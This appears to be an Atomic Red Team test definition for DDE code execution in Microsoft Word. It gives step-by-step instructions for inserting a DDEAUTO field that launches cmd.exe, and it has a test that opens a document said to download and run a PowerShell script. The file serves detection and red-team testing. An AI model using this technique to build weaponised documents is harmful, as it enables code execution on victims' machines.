---
attack_technique: T1173
display_name: Dynamic Data Exchange

atomic_tests:
- name: Execute Commands
  auto_generated_guid: f592ba2a-e9e8-4d62-a459-ef63abd819fd
  description: |
    Executes commands via DDE using Microsfot Word

  supported_platforms:
    - windows

  executor:
    name: manual
    steps: |
      Open Microsoft Word

      Insert tab -> Quick Parts -> Field

      Choose = (Formula) and click ok.

      After that, you should see a Field inserted in the document with an error "!Unexpected End of Formula", right-click the Field, and choose Toggle Field Codes.

      The Field Code should now be displayed, change it to Contain the following:

      {DDEAUTO c:\\windows\\system32\\cmd.exe "/k calc.exe"  }

- name: Execute PowerShell script via Word DDE
  auto_generated_guid: 47c21fb6-085e-4b0d-b4d2-26d72c3830b3
  description: |
    When the word document opens it will prompt the user to click ok on a dialogue box, then attempt to run PowerShell with DDEAUTO to download and execute a powershell script
  supported_platforms:
    - windows
  executor:
    name: command_prompt
    elevation_required: false
    command: |
      start $PathToAtomicsFolder\T1173\bin\DDE_Document.docx
